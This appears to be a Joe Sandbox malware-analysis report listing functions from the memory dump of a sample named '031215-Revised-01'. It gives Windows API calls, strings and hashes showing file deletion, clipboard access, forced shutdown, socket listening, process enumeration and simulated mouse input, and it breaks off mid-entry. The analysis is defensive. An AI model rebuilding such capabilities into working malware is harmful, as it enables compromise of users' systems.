                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 3102970594-0
                                        • Opcode ID: 67e95932ebf66226940a86d3a3fee3b27424d9cd978f9b775f25ef756957994c
                                        • Instruction ID: 4e45f987a0e2af79e5bfb496c0cfd4456131da5f03bc0b782c764945b1ec01c6
                                        • Opcode Fuzzy Hash: 67e95932ebf66226940a86d3a3fee3b27424d9cd978f9b775f25ef756957994c
                                        • Instruction Fuzzy Hash: CA026C706042049FD754CF28C991E2ABBE5EF89308F18C49DF94ACB6A2DB31ED45DB91
                                        Function 000E8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 000E8257
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 000E8267
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000E8273
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000E8310
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8324
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8356
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000E838C
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000E8395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local$System
                                        • String ID: *.*
                                        • API String ID: 1464919966-438819550
                                        • Opcode ID: 3171552701263003676ca32dfecb7494f140d81dc08e0175f62770e207f2097b
                                        • Instruction ID: 8ae52b013d8b3af0e91c41def56390c18baf16163696cdaa43416452dcec1a74
                                        • Opcode Fuzzy Hash: 3171552701263003676ca32dfecb7494f140d81dc08e0175f62770e207f2097b
                                        • Instruction Fuzzy Hash: 45619B725043459FCB10EF60C840AAEB3E8FF89310F04892EF98D97252DB35EA45CB92
                                        Function 000DD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00073AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00073A97,?,?,00072E7F,?,?,?,00000000), ref: 00073AC2
                                          • Part of subcall function 000DE199: GetFileAttributesW.KERNEL32(?,000DCF95), ref: 000DE19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000DD122
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 000DD1DD
                                        • MoveFileW.KERNEL32(?,?), ref: 000DD1F0
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 000DD20D
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000DD237
                                          • Part of subcall function 000DD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,000DD21C,?,?), ref: 000DD2B2
                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 000DD253
                                        • FindClose.KERNEL32(00000000), ref: 000DD264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 1946585618-1173974218
                                        • Opcode ID: 20c3923c27315b25d2e25b7ac1603ce8e17e52d35b76b02afa40dae97aa062f2
                                        • Instruction ID: e4570435cb19d01ff158cd2a692021fa101dd666da232d547503c893eb23a253
                                        • Opcode Fuzzy Hash: 20c3923c27315b25d2e25b7ac1603ce8e17e52d35b76b02afa40dae97aa062f2
                                        • Instruction Fuzzy Hash: EE617C31C0120DAACF15EBE0D992DFDB7B5AF65300F208166E40677292EB34AF09CB65
                                        Function 000EED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 6755d14ae4697287231fdead524d64e0ef01ee9a7f031fbec14dd01ae23b3ebf
                                        • Instruction ID: fce4b86fb7387843f4d2deef99067ee2ce2645faeba1de9914f5f6af70a06ed6
                                        • Opcode Fuzzy Hash: 6755d14ae4697287231fdead524d64e0ef01ee9a7f031fbec14dd01ae23b3ebf
                                        • Instruction Fuzzy Hash: 8B41AC35604691AFE320DF16D888F19BBE1AF44328F14C199E4599BB62C776EC81CFD0
                                        Function 000DE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000D170D
                                          • Part of subcall function 000D16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000D173A
                                          • Part of subcall function 000D16C3: GetLastError.KERNEL32 ref: 000D174A
                                        • ExitWindowsEx.USER32(?,00000000), ref: 000DE932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $ $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-3163812486
                                        • Opcode ID: 81c5fcf9c3ccf0feba62c1abddf9d46ef94831653c5813192c2392225234ba02
                                        • Instruction ID: 93cfa1101fa44c9effe0622f3d5d5ba2f6d59934124578d3484f5536dd1f3a45
                                        • Opcode Fuzzy Hash: 81c5fcf9c3ccf0feba62c1abddf9d46ef94831653c5813192c2392225234ba02
                                        • Instruction Fuzzy Hash: BB012672611311BBEB6433B4DC96FFFB29C9714744F140923F802E62D2DAA05C8086F0
                                        Function 000F1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000F1276
                                        • WSAGetLastError.WSOCK32 ref: 000F1283
                                        • bind.WSOCK32(00000000,?,00000010), ref: 000F12BA
                                        • WSAGetLastError.WSOCK32 ref: 000F12C5
                                        • closesocket.WSOCK32(00000000), ref: 000F12F4
                                        • listen.WSOCK32(00000000,00000005), ref: 000F1303
                                        • WSAGetLastError.WSOCK32 ref: 000F130D
                                        • closesocket.WSOCK32(00000000), ref: 000F133C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                        • String ID:
                                        • API String ID: 540024437-0
                                        • Opcode ID: fdd9d6aac11a17077c58a6f26d49ba55c8d708a451b62fe94d2b96f5bb1c6b5f
                                        • Instruction ID: 4ceb750356be7dd961195b45f89f1ad9ad54a9fd86456e70515d9bd52e40cb9d
                                        • Opcode Fuzzy Hash: fdd9d6aac11a17077c58a6f26d49ba55c8d708a451b62fe94d2b96f5bb1c6b5f
                                        • Instruction Fuzzy Hash: 4E418F31A00104DFD750DF64C488BA9BBE6AF86318F18C199E9568F6D2C771ED81DBE1
                                        Function 000DD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00073AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00073A97,?,?,00072E7F,?,?,?,00000000), ref: 00073AC2
                                          • Part of subcall function 000DE199: GetFileAttributesW.KERNEL32(?,000DCF95), ref: 000DE19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000DD420
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 000DD470
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 000DD481
                                        • FindClose.KERNEL32(00000000), ref: 000DD498
                                        • FindClose.KERNEL32(00000000), ref: 000DD4A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 2649000838-1173974218
                                        • Opcode ID: 9bb6b5d6b7061c5936065c58c13b9bfdc7cb5ba436aca8575ae8790d38088134
                                        • Instruction ID: 519edf9f085325b57813f15724b8dd9f97d30daa8638e87a8a2e980a332a4e18
                                        • Opcode Fuzzy Hash: 9bb6b5d6b7061c5936065c58c13b9bfdc7cb5ba436aca8575ae8790d38088134
                                        • Instruction Fuzzy Hash: C73182314083459BC310EF64C8528EF77E8BF92314F448A1EF4D553292EB34AA09CBA7
                                        Function 000AE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 74328be0f408175808c369549f6b9367736b91dc59e0fa32ccc0dd297459df76
                                        • Instruction ID: 9488d1ddfb88219ae65117cc58e21adca56559d84a232637f7a8fd91969a7af2
                                        • Opcode Fuzzy Hash: 74328be0f408175808c369549f6b9367736b91dc59e0fa32ccc0dd297459df76
                                        • Instruction Fuzzy Hash: BAC25A71E086298FDB65CEA8DD407EAB7F5EB4A304F1441EAD44DE7241E778AE818F40
                                        Function 000E648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000E64DC
                                        • CoInitialize.OLE32(00000000), ref: 000E6639
                                        • CoCreateInstance.OLE32(0010FCF8,00000000,00000001,0010FB68,?), ref: 000E6650
                                        • CoUninitialize.OLE32 ref: 000E68D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: 18b4250bdc11dc981118674e708d42bb8702155860bc8a1cc0ad0c981b211c10
                                        • Instruction ID: 51f14e56446e3e5e74f5f5fb76adc9fa06f7437e1d1b6348f10cfed2ea923e38
                                        • Opcode Fuzzy Hash: 18b4250bdc11dc981118674e708d42bb8702155860bc8a1cc0ad0c981b211c10
                                        • Instruction Fuzzy Hash: CCD15B71608741AFD314DF24C881DABB7E8FF94344F00896DF5999B2A2DB71E905CB92
                                        Function 000F22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 000F22E8
                                          • Part of subcall function 000EE4EC: GetWindowRect.USER32(?,?), ref: 000EE504
                                        • GetDesktopWindow.USER32 ref: 000F2312
                                        • GetWindowRect.USER32(00000000), ref: 000F2319
                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 000F2355
                                        • GetCursorPos.USER32(?), ref: 000F2381
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000F23DF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                        • String ID:
                                        • API String ID: 2387181109-0
                                        • Opcode ID: e53f7665e24e214b8af07b37380a5dfa32889209e21bc86bd2e3892a8354ff38
                                        • Instruction ID: ac8baca923b12c0a90436bd0c8556092ceeb00c1d695868544b5aebad74659e9
                                        • Opcode Fuzzy Hash: e53f7665e24e214b8af07b37380a5dfa32889209e21bc86bd2e3892a8354ff38
                                        • Instruction Fuzzy Hash: 5A31CFB2505359AFC720DF14C845EABBBE9FF84314F000A19F98597291DB75EA48CBD2
                                        Function 000E9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 000E9B78
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000E9C8B
                                          • Part of subcall function 000E3874: GetInputState.USER32 ref: 000E38CB
                                          • Part of subcall function 000E3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000E3966
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000E9BA8
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000E9C75
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                        • String ID: *.*
                                        • API String ID: 1972594611-438819550
                                        • Opcode ID: 783f0edfd34ad60b6b33b703d65d42d239be9cdc79ac9d44567ddbf50472a8c4
                                        • Instruction ID: 34b1f0bab64d54258c424f94905ca4e629a9e25050fcfcdd95393faf3a7960a2
                                        • Opcode Fuzzy Hash: 783f0edfd34ad60b6b33b703d65d42d239be9cdc79ac9d44567ddbf50472a8c4
                                        • Instruction Fuzzy Hash: BE418271D0024AAFDF54EF65C945AEEBBF8EF05310F248155E505B2192EB349E84CFA4
                                        Function 0008997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00089A4E
                                        • GetSysColor.USER32(0000000F), ref: 00089B23
                                        • SetBkColor.GDI32(?,00000000), ref: 00089B36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Color$LongProcWindow
                                        • String ID:
                                        • API String ID: 3131106179-0
                                        • Opcode ID: 0dee26294551ad96731ffca259a3223ff88e0d778c6b8078a2931944c0833122
                                        • Instruction ID: 160fdc621c9042a9edc9d7b8dc19373b4ae8e8caf7b2cc24c67dd0ec208993d2
                                        • Opcode Fuzzy Hash: 0dee26294551ad96731ffca259a3223ff88e0d778c6b8078a2931944c0833122
                                        • Instruction Fuzzy Hash: 95A1F570208414BEE678BB2C8C58E7F26DDFB82350B19020DF582D6ED2CB659D41DBB6
                                        Function 000F1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000F304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000F307A
                                          • Part of subcall function 000F304E: _wcslen.LIBCMT ref: 000F309B
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000F185D
                                        • WSAGetLastError.WSOCK32 ref: 000F1884
                                        • bind.WSOCK32(00000000,?,00000010), ref: 000F18DB
                                        • WSAGetLastError.WSOCK32 ref: 000F18E6
                                        • closesocket.WSOCK32(00000000), ref: 000F1915
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 1601658205-0
                                        • Opcode ID: 08e83e62c96bf03193814815446e74fe213226803bcd64d3c33000cf2f79970a
                                        • Instruction ID: bc3a0f1e71b0ce80ca94db465672e6992ba42c9002f92b77c41167321f7bd187
                                        • Opcode Fuzzy Hash: 08e83e62c96bf03193814815446e74fe213226803bcd64d3c33000cf2f79970a
                                        • Instruction Fuzzy Hash: 9A51A171A00204AFE710AF24C886FBA77E5AB44718F54C058FA4A5F6C3DA75AD428BE1
                                        Function 00101C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: ecf903234c47d4ec521dba45fdf6927ae24171029565607dbf40a875cecef9cc
                                        • Instruction ID: 4c7431879bc99628e552bc9de8fe4d5bd2144318fef1af18719f080fef687e07
                                        • Opcode Fuzzy Hash: ecf903234c47d4ec521dba45fdf6927ae24171029565607dbf40a875cecef9cc
                                        • Instruction Fuzzy Hash: FD2176317402116FE7249F16C844B5A7B95BF95315F198068E88A8B391CBB5DC42CB94
                                        Function 00078060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-1546025612
                                        • Opcode ID: 52f5b08c703cbef701a042f4c125efa30e73e0ea2d3bdbb07154002ad23839b8
                                        • Instruction ID: 6847919f3beca5b4b5a9ea202aeb4f64829facb45c068aeae902cbf28899c709
                                        • Opcode Fuzzy Hash: 52f5b08c703cbef701a042f4c125efa30e73e0ea2d3bdbb07154002ad23839b8
                                        • Instruction Fuzzy Hash: A2A27E70E4061ACBDF74CF58C8447EEB7B1BB54310F24C5AAD819A7281EB799E81CB94
                                        Function 000FA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 000FA6AC
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 000FA6BA
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • Process32NextW.KERNEL32(00000000,?), ref: 000FA79C
                                        • CloseHandle.KERNEL32(00000000), ref: 000FA7AB
                                          • Part of subcall function 0008CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,000B3303,?), ref: 0008CE8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
